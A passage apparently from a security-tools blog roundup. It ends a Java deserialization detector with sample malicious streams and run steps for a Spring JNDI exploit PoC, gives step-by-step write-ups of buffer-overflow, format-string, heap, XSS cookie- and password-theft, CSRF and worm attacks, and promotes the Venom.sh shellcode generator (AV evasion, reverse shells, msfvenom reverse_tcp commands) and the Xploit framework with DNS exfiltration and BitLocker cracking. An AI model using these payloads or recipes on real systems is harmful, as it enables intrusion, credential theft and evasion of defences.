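    out = bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode()
    out += b"\x00" * 8 + b"\x02" + struct.pack(">H", len(fields))
    for typecode, fname, sig in fields:
        out += typecode.encode() + struct.pack(">H", len(fname)) + fname.encode()
        if sig:
            out += bytes([TC_STRING]) + struct.pack(">H", len(sig)) + sig.encode()
    return out + bytes([TC_ENDBLOCKDATA, TC_NULL])


# Constructed samples (hand-built, not captures): the shape of the object the post
# describes, and a harmless object with an int field and a String field.
JNDI_TARGET = "rmi://x.x.x.x:1099/Object"
SAMPLE_MALICIOUS = (STREAM_MAGIC + bytes([TC_OBJECT])
                    + _classdesc("org.springframework.transaction.jta.JtaTransactionManager",
                                 [("L", "userTransactionName", "Ljava/lang/String;")])
                    + bytes([TC_STRING]) + struct.pack(">H", len(JNDI_TARGET)) + JNDI_TARGET.encode())
SAMPLE_BENIGN = (STREAM_MAGIC + bytes([TC_OBJECT])
                 + _classdesc("com.example.Greeting", [("I", "count", ""), ("L", "text", "Ljava/lang/String;")])
                 + struct.pack(">I", 3) + bytes([TC_STRING]) + b"\x00\x05hello")
```

Run findings() on a stream before handing it to ObjectInputStream and drop the connection when the list is non-empty; the class list it returns is also what a JVM-side filter (an allowlist of expected classes) should be built from.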

Server

Client file

Running the PoC
To build and run the server run the following:

git clone https://github.com/zerothoughts/spring-jndi && cd spring-jndi
cd server
mvn install
java -cp "target/*" ExploitableServer 9999

Afterwards to run the client, start up a 2nd terminal:

cd client
mvn install 
java -cp "target/*" ExploitClient 127.0.0.1 9999 127.0.0.1

Source: http://zerothoughts.tumblr.com/post/137831000514/spring-framework-deserialization-rce

SecurityLab is a collection of program vulnerabilities, OpenSSL, and web app attacks.


NOTE: This Post For Education and Security Research Only.

SecurityLab is a collection of program vulnerabilities, OpenSSL, and web app attacks.
Explanation
Lab1:
sploit1
The vulnerability is: strcpy() does not check the number of bits which will be copied into “char buf[96]”, so we overflow the return address of “lab_main()” and redirect the execution of the program to the shellcode we provide which runs a shell terminal.

example-sploit1 in gdb

sploit2
The vulnerability was that the len specified in the program was set to a max of 272. This allowed the attack string to overwrite i and len. The i variable was first overwritten such that it would remain small, so just the last byte of its four was overwritten with 0xb. Then len was overwritten with 0x0000011c to enable i to index into buf to reach where the return address lay in memory. The environment variables were necessary to split up the attack string whenever a null byte was needed.
sploit3
The vulnerability is: “char buf[64]” is only 64 bytes, but “bar ( arg, buf, 88 )” allows us to write 88 bytes into it, therefore, we overflow the return address of “foo()” and redirect the execution of the program to the shellcode we provide which runs a shell terminal.
sploit4
Similar to sploit2, len could be set to a max of 169 and so len and i could be overwritten. The difference for sploit4 is that there is no indexing into the array using i. Thus, len first has to be overwritten to allow enough iterations to overwrite i. The new value of i to be written needs to be at least such that len – i = the number of iterations needed to fully overwrite all four bytes of the return address. The environment variables were necessary to split up the attack string whenever a null byte was needed.
sploit5
The vulnerability is: passing a certain number of "%x"s to the "snprintf()" function allows us to change the argument pointer to point to the beginning of the "formatString". At the beginning of the "formatString" we insert the locations of the first 4 bytes of the return address of foo(), separated by NULL bytes. We then pass "%##u%hhn" to "snprintf()" four times to change the first 4 bytes of the return address one at a time. We then let the program continue to run, and once it returns from foo(), it will jump to the beginning of "char buf[1024]" and start executing the shellcode we inserted there.
sploit6
The solution required two fake chunk tags. The first was located on the 8 bytes before the address of q where the double free was called and the second was placed a short distance away. The first tag’s next pointer pointed to the second fake tag. The second tag’s next pointer had the address of the return address, which was copied to the first’s next. It was then dereferenced and overwritten with a value in tmalloc.c’s “arena”, redirecting program execution. Placing the shellcode somewhere after the q region allowed a new shell to be spawned.

Lab2:
client
To build upon the sockets already in place, we used SSL, BIO, and CTX objects. The CTX object allowed the client to communicate with SSLv3 and TLSv1 only, via SSLv23_method and the SSL_OP_NO_SSLv2 option. SSL_CTX_set_cipher_list set SHA1 as the class of cipher suites to be used. SSL_get_verify_result, the CA_LIST "ece568ca.pem", and SSL_get_peer_certificate were used to verify the certificate. A failing SSL_connect causes the client to output errors from the BIO. X509_NAME_get_text_by_NID, X509_get_subject_name, NID_commonName, and NID_pkcs9_emailAddress were used to extract and check the common name and email from the certificate. SSL_write sent the secret and SSL_read got the server response and checked for errors, whether to continue reading, and when the server finished (closed the connection). Upon connection close, the client responds with its own SSL_shutdown. For cleanup, SSL_free and SSL_CTX_free were used. The buf had to be null-terminated at the number of bytes read, otherwise unexpected garbage characters could show up.
server
It is very similar to the client. Notable differences are that a child is spawned for every client connection to try SSL_accept and output errors from the BIO if it fails. The SSL_read is done first to react to the client's SSL_write and needs to be iterated until the secret has been completely read. The buf that stores the client's message needs to be null-terminated at len due to possible unexpected garbage characters. Then the server does an SSL_write to give the answer to the client. The server-side shutdown is a bit different. The first SSL_shutdown will send a close_notify to the client, but not look for the client's. Next, shutdown is called to send a TCP FIN, required for certain clients, and then the server calls SSL_shutdown a second time.

Client-Server

Lab3:
Attack A. Cookie Theft
For this attack, we insert the “email script” javascript text after “http://zoobar.csl.toronto.edu/users.php?user=”>” so that it will be executed. It must be URL encoded or else it won’t work. The payload is set to “document.cookie” to get cookie information. We quickly reload the page to hide the errors from the user.
Attack B. Cross-Site Request Forgery
For this attack, we create a form with fields identical to the “http://zoobar.csl.toronto.edu/transfer.php” “transfer_form” and specify the transfer of 10 zoobars to “attacker” in the form. We submit the form to an <iframe> instance of “zoobar.csl.utoronto.edu” and imitate a “send” button click. Finally, we listen for when the form is submitted and quickly redirect to “http://ece568.csl.toronto.edu/”.
Attack C. Password Theft
For this attack, we create a form with fields identical to the "http://zoobar.csl.toronto.edu/login.php" "login_form" and submit it with a "special" "username.value" string. The "special" string is constructed such that its content will be evaluated and it will listen for a "Log in" button click and send the "username" and "password" using the email script. Certain sections of the string must be escaped for it to process without errors. We use "event.preventDefault();" to stop all actions until the email script has been processed. We also have "image.onerror" to listen for when the email script starts to be processed, and then remove the listener and click the login button so that everything appears as it normally would for the user.
Attack D. Profile Worm
The vulnerability is that there is an eval on document.getElementById(‘zoobars’).className. The malicious profile text consists of a span element that contains the same id ‘zoobars’ as an existing element. Since this inserted span element comes first, the eval will now be passed an arbitrary string as the class name. Two iframes are created, one to transfer 1 zoobar to the attacker and the other copies the attacker profile to the viewer profile. To set the attacker profile to appear to have 10 zoobars, the string contains “total = 10;”. This initializes total and since the later assignment to total will fail, total remains unchanged.

Lab4:
4.1
For this part, we specify the email_scope to be “email” so that we have access to the client’s email information and also the principle of least privilege is satisfied.
4.2
Before calling getPeopleInfo(), a new, similar function validateToken() is used. An XMLHttpRequest is created to get the token info for a particular access token. On a good request (status 200), the request’s responseText is parsed into JSON and the value for the audience key is compared with the client ID. If it matches, the given access token was actually for that client and getPeopleInfo() can be called to display profile information. Otherwise, no profile info is shown and the validity check is shown to have failed.
4.3
For this part, we implemented drive() to handle the authentication process. We first check if the client already has an authentication code, if not, we redirect them to the Google Login API which will prompt the client to log into their account and grant access based on the SCOPE we provide. Once the client is successfully authenticated, we retrieve the client’s credentials by providing their authentication code and store the credentials in a file locally.
4.4
Extending drive() after 4.3, the access token from credentials is applied to an Http object. A Google+ API service object is created to get the person info of the authenticated user (‘me’) and write it to profile.out. Then, a Google Drive service object is created to upload (insert) a file with the body containing specified metadata and the media_body containing profile.out.
Usage:

sudo apt-get install libx32gcc-4.8-dev
sudo apt-get install libc6-dev-i386
git clone https://github.com/hanwang92/SecurityLab && cd SecurityLab
cd into each of Lab1 through Lab4
Compile and run them one by one, and read the explanatory notes inside each folder.

Source: https://github.com/hanwang92

Venom.sh Codename: Komodo Venom v1.0.10.

Changelog Codename: Komodo Venom v1.0.10:
FUNCTION  |  DESCRIPTION
--------- |  ---------------------------------------------------------------
bug fix   ->  ‘getsystem’ bug fixed in all resource files (.rc)
improved  ->  terminal displays reviewed/improved/fixed
improved  ->  ‘elementary OS’ IP address support added (LHOST)
improved  ->  ‘@echo off’ added to all .bat files to hide output in terminal windows
added     ->  ‘apache2’ added to deliver your payloads using a malicious URL
added     ->  ‘gather.rc’ post-exploitation resource file (gather target info)
added     ->  ‘SimpleHTTPServerWithupload.py’, a SimpleHTTPServer with download/upload capabilities if you need it (manual run)
--------- |  ---------------------------------------------------------------

Komodo Venom v1.0.10

The script uses msfvenom (Metasploit) to generate shellcode in different formats ( c | python | ruby | dll | msi | hta-psh ), injects the generated shellcode into one function (example: python; “the python function will execute the shellcode in RAM”) and uses compilers such as gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to receive the remote connection (reverse shell or Meterpreter session).

The ‘shellcode generator’ tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, PowerSploit, etc. “P.S. some payloads are undetectable by AV solutions, yes!!!” One of the reasons for that is the use of a function to execute the 2nd stage of the shell/Meterpreter directly in the target’s RAM.

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON

F – FAQ (frequently asked questions)
E – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats,
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command: sudo msfvenom --help-formats

Now let's generate a simple shellcode for windows/shell/reverse_tcp,
choosing powershell as the output format. Note that we will not use
the -o (save the payload) option, so the generated shellcode
is only displayed in the current terminal window.
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

Source: http://sourceforge.net/p/crisp-shellcode-generator/

Updates Xploit is an Open source exploit framework made in C#.

Changelog 25/1/2016:
+ Update ConsoleCommand.cs
+ XPloit: Process Memory dump
+ Xploit.Module: Update ProcessMemoryDump.cs
+ XPloit.sln : fix letter
+ XPloit.Core.Rfid: Fix uppercase 2/2

xploit-25-1-2016

Xploit is an open-source exploit framework written in C#.

header CMD XPloit

Feature and Modules:
+ Auxiliary/Local
— Local Brute force by wordlist
— Dns Exfiltrate
— DNS-Exfiltration file parser
— DNS-Serve
— Invisible socks proxy
— NFC Restore system
— TCP Sniffer to file
— Kill a process in local machine
— Execute a system command in local machine
— Generate a wordList
+ Encoders/String ; Encode byte[] to base64 string.
+ Nops/Php ; PHP Nop
+ Payloads/Local/BruteForce
— Crack Bitlocker drive calling windows API
— Crack Bitlocker drive
— Crack MySql sniffed with WireShark Credentials

How to run:

git clone https://github.com/shargon/Xploit && cd Xploit
or
download xploit-master.zip,
unzip it, right-click the solution and open it with Visual Studio xxxx Community,
then build.
Open the folder Xploit > bin > Debug and run xploit.exe

Download: xploit-master.zip
Source: https://github.com/shargon
